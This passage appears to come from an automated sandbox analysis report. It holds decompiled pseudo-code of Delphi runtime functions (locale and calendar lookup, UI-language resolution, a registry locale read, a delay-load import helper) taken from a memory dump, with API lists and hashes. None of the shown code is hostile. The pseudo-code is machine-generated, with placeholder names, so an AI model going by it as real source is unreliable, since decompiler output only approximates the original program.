                                                            0x0041e999
                                                            0x0041e86d
                                                            0x0041e87b
                                                            0x0041e880
                                                            0x0041e887
                                                            0x0041e88c
                                                            0x0041e88c
                                                            0x0041e890
                                                            0x0041e893
                                                            0x0041e895
                                                            0x0041e896
                                                            0x0041e898
                                                            0x0041e8a1
                                                            0x0041e8a9
                                                            0x0041e8aa
                                                            0x0041e8aa
                                                            0x0041e898
                                                            0x0041e8bb
                                                            0x0041e8bb
                                                            0x0041e9a3
                                                            0x0041e9a7
                                                            0x0041e9ac
                                                            0x0041e9ac
                                                            0x0041e9ae
                                                            0x0041e9c2
                                                            0x0041e9ca
                                                            0x0041e9d1
                                                            0x0041e9d6
                                                            0x0041e9d6
                                                            0x0041e9da
                                                            0x0041e9dd
                                                            0x0041e9df
                                                            0x0041e9e0
                                                            0x0041e9e2
                                                            0x0041e9e2
                                                            0x0041e9fa
                                                            0x0041ea00
                                                            0x0041ea05
                                                            0x0041ea06
                                                            0x0041ea06
                                                            0x0041e9e2
                                                            0x0041ea0e
                                                            0x0041ea14
                                                            0x0041ea19
                                                            0x0041ea20
                                                            0x0041ea25
                                                            0x0041ea25
                                                            0x0041ea27
                                                            0x0041ea2e
                                                            0x0041ea30
                                                            0x0041ea31
                                                            0x0041ea34
                                                            0x0041ea43

                                                            APIs
                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E870
                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E87B
                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8B0
                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E8BB
                                                            • GetThreadLocale.KERNEL32(00000000,00000004), ref: 0041E94C
                                                            • EnumCalendarInfoW.KERNEL32(0041E6A4,00000000,00000000,00000004), ref: 0041E957
                                                            • GetThreadLocale.KERNEL32(00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E98E
                                                            • EnumCalendarInfoW.KERNEL32(0041E73C,00000000,00000000,00000003,0041E6A4,00000000,00000000,00000004), ref: 0041E999
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CalendarEnumInfoLocaleThread
                                                            • String ID: B.C.$ToA$K$K$K
                                                            • API String ID: 683597275-1724967715
                                                            • Opcode ID: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                            • Instruction ID: 5f9a2d1895d99171d8daf0119b8bb3b5d98f795b9e196a74a36fcd0882631485
                                                            • Opcode Fuzzy Hash: 30548e6079ac2033bf0e04708f2267278c7844b43060e3a4cc9a960100252a35
                                                            • Instruction Fuzzy Hash: 3061D7786002009FD710EF2BCC85AD677A9FB84354B518A7AFC019B3A6CB78DC41CB99
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040A250, Relevance: 21.0, APIs: 8, Strings: 4, Instructions: 28libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E0040A250() {
				signed int _t2;
				_Unknown_base(*)()* _t8;

				InitializeCriticalSection(0x4bdc10);
				 *0x4bdc28 = 0x7f;
				_t2 = GetVersion() & 0x000000ff;
				 *0x4bdc0c = _t2 - 6 >= 0;
				if( *0x4bdc0c != 0) {
					 *0x4bdc00 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadPreferredUILanguages");
					 *0x4bdc04 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "SetThreadPreferredUILanguages");
					_t8 = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetThreadUILanguage");
					 *0x4bdc08 = _t8;
					return _t8;
				}
				return _t2;
			}





                                                            0x0040a255
                                                            0x0040a25a
                                                            0x0040a268
                                                            0x0040a270
                                                            0x0040a27e
                                                            0x0040a295
                                                            0x0040a2af
                                                            0x0040a2c4
                                                            0x0040a2c9
                                                            0x00000000
                                                            0x0040a2c9
                                                            0x0040a2ce

                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A255
                                                            • GetVersion.KERNEL32(004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A263
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A28A
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A290
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2A4
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2AA
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadUILanguage,00000000,kernel32.dll,SetThreadPreferredUILanguages,00000000,kernel32.dll,GetThreadPreferredUILanguages,004BDC10,004B5037,00000400,00000000,004B50D7), ref: 0040A2BE
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040A2C4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc$CriticalInitializeSectionVersion
                                                            • String ID: GetThreadPreferredUILanguages$GetThreadUILanguage$SetThreadPreferredUILanguages$kernel32.dll
                                                            • API String ID: 74573329-1403180336
                                                            • Opcode ID: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                            • Instruction ID: d84369935ce7e940d286def53580bf621e493dc20acbcc0033f4522394103be5
                                                            • Opcode Fuzzy Hash: 58d327082e64ef42c945ef42cd8e374577ec01c28157982806072b66866d47a0
                                                            • Instruction Fuzzy Hash: F9F098A49853413DD6207F769D07B292D685A0170AF644AFFB410763D3EEFE4190E71E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041E0AC, Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 216threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E0041E0AC(int __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				int _t55;
				void* _t121;
				void* _t128;
				void* _t151;
				void* _t152;
				intOrPtr _t172;
				intOrPtr _t204;
				signed short _t212;
				int _t214;
				intOrPtr _t216;
				intOrPtr _t217;
				void* _t224;

				_t224 = __fp0;
				_t211 = __edi;
				_t216 = _t217;
				_t152 = 7;
				do {
					_push(0);
					_push(0);
					_t152 = _t152 - 1;
				} while (_t152 != 0);
				_push(__edi);
				_t151 = __edx;
				_t214 = __eax;
				_push(_t216);
				_push(0x41e391);
				_push( *[fs:eax]);
				 *[fs:eax] = _t217;
				_t55 = IsValidLocale(__eax, 1);
				_t219 = _t55;
				if(_t55 == 0) {
					_t214 = GetThreadLocale();
				}
				_t172 =  *0x416f50; // 0x416f54
				E00409D24(_t151 + 0xbc, _t172);
				E0041E7CC(_t214, _t151, _t151, _t211, _t214, _t224);
				E0041E4A0(_t214, _t151, _t151, _t211, _t214);
				E0041E55C(_t214, _t151, _t151, _t211, _t214);
				E0041E034(_t214, 0, 0x14,  &_v20);
				E00407E00(_t151, _v20);
				E0041E034(_t214, 0x41e3ac, 0x1b,  &_v24);
				 *((char*)(_t151 + 4)) = E0041A1C4(0x41e3ac, 0, _t219);
				E0041E034(_t214, 0x41e3ac, 0x1c,  &_v28);
				 *((char*)(_t151 + 0xc6)) = E0041A1C4(0x41e3ac, 0, _t219);
				 *((short*)(_t151 + 0xc0)) = E0041E080(_t214, 0x2c, 0xf);
				 *((short*)(_t151 + 0xc2)) = E0041E080(_t214, 0x2e, 0xe);
				E0041E034(_t214, 0x41e3ac, 0x19,  &_v32);
				 *((char*)(_t151 + 5)) = E0041A1C4(0x41e3ac, 0, _t219);
				_t212 = E0041E080(_t214, 0x2f, 0x1d);
				 *(_t151 + 6) = _t212;
				_push(_t212);
				E0041EB18(_t214, _t151, L"m/d/yy", 0x1f, _t212, _t214, _t219,  &_v36);
				E00407E00(_t151 + 0xc, _v36);
				_push( *(_t151 + 6) & 0x0000ffff);
				E0041EB18(_t214, _t151, L"mmmm d, yyyy", 0x20, _t212, _t214, _t219,  &_v40);
				E00407E00(_t151 + 0x10, _v40);
				 *((short*)(_t151 + 8)) = E0041E080(_t214, 0x3a, 0x1e);
				E0041E034(_t214, 0x41e400, 0x28,  &_v44);
				E00407E00(_t151 + 0x14, _v44);
				E0041E034(_t214, 0x41e414, 0x29,  &_v48);
				E00407E00(_t151 + 0x18, _v48);
				E00407A20( &_v12);
				E00407A20( &_v16);
				E0041E034(_t214, 0x41e3ac, 0x25,  &_v52);
				_t121 = E0041A1C4(0x41e3ac, 0, _t219);
				_t220 = _t121;
				if(_t121 != 0) {
					E00407E48( &_v8, 0x41e438);
				} else {
					E00407E48( &_v8, 0x41e428);
				}
				E0041E034(_t214, 0x41e3ac, 0x23,  &_v56);
				_t128 = E0041A1C4(0x41e3ac, 0, _t220);
				_t221 = _t128;
				if(_t128 == 0) {
					E0041E034(_t214, 0x41e3ac, 0x1005,  &_v60);
					if(E0041A1C4(0x41e3ac, 0, _t221) != 0) {
						E00407E48( &_v12, L"AMPM ");
					} else {
						E00407E48( &_v16, L" AMPM");
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E004087C4(_t151 + 0x1c, _t151, 4, _t212, _t214);
				_push(_v12);
				_push(_v8);
				_push(L":mm:ss");
				_push(_v16);
				E004087C4(_t151 + 0x20, _t151, 4, _t212, _t214);
				 *((short*)(_t151 + 0xa)) = E0041E080(_t214, 0x2c, 0xc);
				 *((short*)(_t151 + 0xc4)) = 0x32;
				_pop(_t204);
				 *[fs:eax] = _t204;
				_push(0x41e398);
				return E00407A80( &_v60, 0xe);
			}





























                                                            0x0041e0ac
                                                            0x0041e0ac
                                                            0x0041e0ad
                                                            0x0041e0af
                                                            0x0041e0b4
                                                            0x0041e0b4
                                                            0x0041e0b6
                                                            0x0041e0b8
                                                            0x0041e0b8
                                                            0x0041e0bd
                                                            0x0041e0be
                                                            0x0041e0c0
                                                            0x0041e0c4
                                                            0x0041e0c5
                                                            0x0041e0ca
                                                            0x0041e0cd
                                                            0x0041e0d3
                                                            0x0041e0d8
                                                            0x0041e0da
                                                            0x0041e0e1
                                                            0x0041e0e1
                                                            0x0041e0e9
                                                            0x0041e0ef
                                                            0x0041e0f8
                                                            0x0041e101
                                                            0x0041e10a
                                                            0x0041e11c
                                                            0x0041e126
                                                            0x0041e13b
                                                            0x0041e14a
                                                            0x0041e15d
                                                            0x0041e16c
                                                            0x0041e182
                                                            0x0041e199
                                                            0x0041e1b0
                                                            0x0041e1bf
                                                            0x0041e1d2
                                                            0x0041e1d4
                                                            0x0041e1d8
                                                            0x0041e1e9
                                                            0x0041e1f4
                                                            0x0041e1fd
                                                            0x0041e20e
                                                            0x0041e219
                                                            0x0041e22e
                                                            0x0041e242
                                                            0x0041e24d
                                                            0x0041e262
                                                            0x0041e26d
                                                            0x0041e275
                                                            0x0041e27d
                                                            0x0041e292
                                                            0x0041e29c
                                                            0x0041e2a1
                                                            0x0041e2a3
                                                            0x0041e2bc
                                                            0x0041e2a5
                                                            0x0041e2ad
                                                            0x0041e2ad
                                                            0x0041e2d1
                                                            0x0041e2db
                                                            0x0041e2e0
                                                            0x0041e2e2
                                                            0x0041e2f4
                                                            0x0041e305
                                                            0x0041e31e
                                                            0x0041e307
                                                            0x0041e30f
                                                            0x0041e30f
                                                            0x0041e305
                                                            0x0041e323
                                                            0x0041e326
                                                            0x0041e329
                                                            0x0041e32e
                                                            0x0041e339
                                                            0x0041e33e
                                                            0x0041e341
                                                            0x0041e344
                                                            0x0041e349
                                                            0x0041e354
                                                            0x0041e369
                                                            0x0041e36d
                                                            0x0041e378
                                                            0x0041e37b
                                                            0x0041e37e
                                                            0x0041e390

                                                            APIs
                                                            • IsValidLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0D3
                                                            • GetThreadLocale.KERNEL32(?,00000001,00000000,0041E391,?,?,?,?,00000000,00000000), ref: 0041E0DC
                                                              • Part of subcall function 0041E080: GetLocaleInfoW.KERNEL32(?,0000000F,?,00000002,0000002C,?,?,?,0041E182,?,00000001,00000000,0041E391), ref: 0041E093
                                                              • Part of subcall function 0041E034: GetLocaleInfoW.KERNEL32(?,?,?,00000100), ref: 0041E052
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Locale$Info$ThreadValid
                                                            • String ID: AMPM$2$:mm$:mm:ss$AMPM $ToA$m/d/yy$mmmm d, yyyy
                                                            • API String ID: 233154393-2808312488
                                                            • Opcode ID: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                            • Instruction ID: 756c878950b08f5201d8436663b045c7a1b9734561897f0b9d621fb0846820d7
                                                            • Opcode Fuzzy Hash: 89dbd54baef797781c63ab5ee0a362cfcea0ac090ff54d53303b749289e312d8
                                                            • Instruction Fuzzy Hash: 887134387011199BDB05EB67C841BDE76AADF88304F50807BF904AB246DB3DDD82879E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040A7E4, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 71%
                                                            			E0040A7E4(signed short __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				char _v8;
				void* _t18;
				signed short _t28;
				intOrPtr _t35;
				intOrPtr* _t44;
				intOrPtr _t47;

				_t42 = __edi;
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t44 = __edx;
				_t28 = __eax;
				_push(_t47);
				_push(0x40a8e8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t47;
				EnterCriticalSection(0x4bdc10);
				if(_t28 !=  *0x4bdc28) {
					LeaveCriticalSection(0x4bdc10);
					E00407A20(_t44);
					if(IsValidLocale(_t28 & 0x0000ffff, 2) != 0) {
						if( *0x4bdc0c == 0) {
							_t18 = E0040A4CC(_t28, _t28, _t44, __edi, _t44);
							L00403738();
							if(_t28 != _t18) {
								if( *_t44 != 0) {
									_t18 = E004086E4(_t44, E0040A900);
								}
								L00403738();
								E0040A4CC(_t18, _t28,  &_v8, _t42, _t44);
								E004086E4(_t44, _v8);
							}
						} else {
							E0040A6C8(_t28, _t44);
						}
					}
					EnterCriticalSection(0x4bdc10);
					 *0x4bdc28 = _t28;
					E0040A34C(0x4bdc2a, E004084EC( *_t44), 0xaa);
					LeaveCriticalSection(0x4bdc10);
				} else {
					E0040858C(_t44, 0x55, 0x4bdc2a);
					LeaveCriticalSection(0x4bdc10);
				}
				_pop(_t35);
				 *[fs:eax] = _t35;
				_push(E0040A8EF);
				return E00407A20( &_v8);
			}









                                                            0x0040a7e4
                                                            0x0040a7e7
                                                            0x0040a7e9
                                                            0x0040a7ea
                                                            0x0040a7eb
                                                            0x0040a7ed
                                                            0x0040a7f1
                                                            0x0040a7f2
                                                            0x0040a7f7
                                                            0x0040a7fa
                                                            0x0040a802
                                                            0x0040a80e
                                                            0x0040a835
                                                            0x0040a83c
                                                            0x0040a84e
                                                            0x0040a857
                                                            0x0040a868
                                                            0x0040a86d
                                                            0x0040a875
                                                            0x0040a87a
                                                            0x0040a883
                                                            0x0040a883
                                                            0x0040a888
                                                            0x0040a890
                                                            0x0040a89a
                                                            0x0040a89a
                                                            0x0040a859
                                                            0x0040a85d
                                                            0x0040a85d
                                                            0x0040a857
                                                            0x0040a8a4
                                                            0x0040a8a9
                                                            0x0040a8c3
                                                            0x0040a8cd
                                                            0x0040a810
                                                            0x0040a81c
                                                            0x0040a826
                                                            0x0040a826
                                                            0x0040a8d4
                                                            0x0040a8d7
                                                            0x0040a8da
                                                            0x0040a8e7

                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000,00000000), ref: 0040A802
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A826
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227,?,?,00000000,00000000), ref: 0040A835
                                                            • IsValidLocale.KERNEL32(00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A847
                                                            • EnterCriticalSection.KERNEL32(004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8A4
                                                            • LeaveCriticalSection.KERNEL32(004BDC10,004BDC10,00000000,00000002,004BDC10,004BDC10,00000000,0040A8E8,?,?,?,00000000,?,0040B1C8,00000000,0040B227), ref: 0040A8CD
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                            • String ID: en-US,en,
                                                            • API String ID: 975949045-3579323720
                                                            • Opcode ID: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                            • Instruction ID: af4c48ae6f9d4b9345a2e7437780db60bfff4a38cfd5d6d0e3948ff18df55379
                                                            • Opcode Fuzzy Hash: e3721d42ea745a9edd8ebaecb4ab5b2828546a05d0e92c0f55165f56426ca85b
                                                            • Instruction Fuzzy Hash: 31218461B1031077DA11BB668C03B5E29A89B44705BA0887BB140B32D2EEBD8D52D66F
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0042301C, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 82registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 61%
                                                            			E0042301C(void* __ebx, void* __esi, void* __eflags) {
				char _v8;
				void* _v12;
				char _v16;
				char _v20;
				intOrPtr* _t21;
				intOrPtr _t61;
				void* _t68;

				_push(__ebx);
				_v20 = 0;
				_v8 = 0;
				_push(_t68);
				_push(0x423116);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xfffffff0;
				_t21 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"GetUserDefaultUILanguage");
				if(_t21 == 0) {
					if(E0041FF2C() != 2) {
						if(E00422FF4(0, L"Control Panel\\Desktop\\ResourceLocale", 0x80000001,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					} else {
						if(E00422FF4(0, L".DEFAULT\\Control Panel\\International", 0x80000003,  &_v12, 1, 0) == 0) {
							E00422FE8();
							RegCloseKey(_v12);
						}
					}
					E0040873C( &_v20, _v8, 0x42322c);
					E00405920(_v20,  &_v16);
					if(_v16 != 0) {
					}
				} else {
					 *_t21();
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0042311D);
				E00407A20( &_v20);
				return E00407A20( &_v8);
			}










                                                            0x00423022
                                                            0x00423025
                                                            0x00423028
                                                            0x0042302d
                                                            0x0042302e
                                                            0x00423033
                                                            0x00423036
                                                            0x00423049
                                                            0x00423050
                                                            0x00423063
                                                            0x004230b8
                                                            0x004230c5
                                                            0x004230ce
                                                            0x004230ce
                                                            0x00423065
                                                            0x00423080
                                                            0x0042308d
                                                            0x00423096
                                                            0x00423096
                                                            0x00423080
                                                            0x004230de
                                                            0x004230e9
                                                            0x004230f4
                                                            0x004230f4
                                                            0x00423052
                                                            0x00423052
                                                            0x00423054
                                                            0x004230fa
                                                            0x004230fd
                                                            0x00423100
                                                            0x00423108
                                                            0x00423115

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423043
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00423116), ref: 00423096
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressCloseHandleModuleProc
                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                            • API String ID: 4190037839-2401316094
                                                            • Opcode ID: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                            • Instruction ID: 05790bdd6973bc135d390eb6e5b6569f0703c8ea8b4006eead18837270f0a894
                                                            • Opcode Fuzzy Hash: 0c53a133d6644a1b94ef3c959f72937b5652b11bdcaf1ce6cf384129006bdbe5
                                                            • Instruction Fuzzy Hash: 39217930B00228ABDB10EEB5DD42A9F73F4EB44345FA04477A500E3281DB7CAB41962D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040D218, Relevance: 13.8, APIs: 9, Instructions: 258COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 67%
                                                            			E0040D218(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4b7c40, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4b7c40;
				_v52 = E0040D6C8( *0x004B7C44);
				_v48 = E0040D6D8( *0x004B7C48);
				_v44 = E0040D6E8( *0x004B7C4C);
				_v40 = E0040D6F8( *0x004B7C50);
				_v36 = E0040D6F8( *0x004B7C54);
				_v32 = E0040D6F8( *0x004B7C58);
				_v28 =  *0x004B7C5C;
				memcpy( &_v92, 0x4b7c60, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4b7c60;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4b7c84; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E0040D708( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4be640 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4be640 != 0) {
							_t191 =  *0x4be640(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4be644 != 0) {
									_t191 =  *0x4be644(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4b7c8c; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4be640 != 0) {
						_t142 =  *0x4be640(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E0040CBA0(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4b7c3c; // 0x0
									 *_v20 = _t126;
									 *0x4b7c3c = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4be644 != 0) {
							_t142 =  *0x4be644(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4b7c88; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4be640(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4be640 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4be640(5,  &_v92);
						}
						return _t191;
					}
				}
			}







































                                                            0x0040d22c
                                                            0x0040d232
                                                            0x0040d234
                                                            0x0040d237
                                                            0x0040d244
                                                            0x0040d251
                                                            0x0040d25e
                                                            0x0040d26b
                                                            0x0040d278
                                                            0x0040d285
                                                            0x0040d28e
                                                            0x0040d29c
                                                            0x0040d29e
                                                            0x0040d29f
                                                            0x0040d2a5
                                                            0x0040d2ab
                                                            0x0040d2b2
                                                            0x0040d2b4
                                                            0x0040d2ba
                                                            0x0040d2c0
                                                            0x0040d2d0
                                                            0x00000000
                                                            0x0040d2d5
                                                            0x0040d2e2
                                                            0x0040d2e7
                                                            0x0040d2e9
                                                            0x0040d2eb
                                                            0x0040d2eb
                                                            0x0040d2f1
                                                            0x0040d2f4
                                                            0x0040d2fc
                                                            0x0040d306
                                                            0x0040d309
                                                            0x0040d30e
                                                            0x0040d329
                                                            0x0040d310
                                                            0x0040d31c
                                                            0x0040d31c
                                                            0x0040d32c
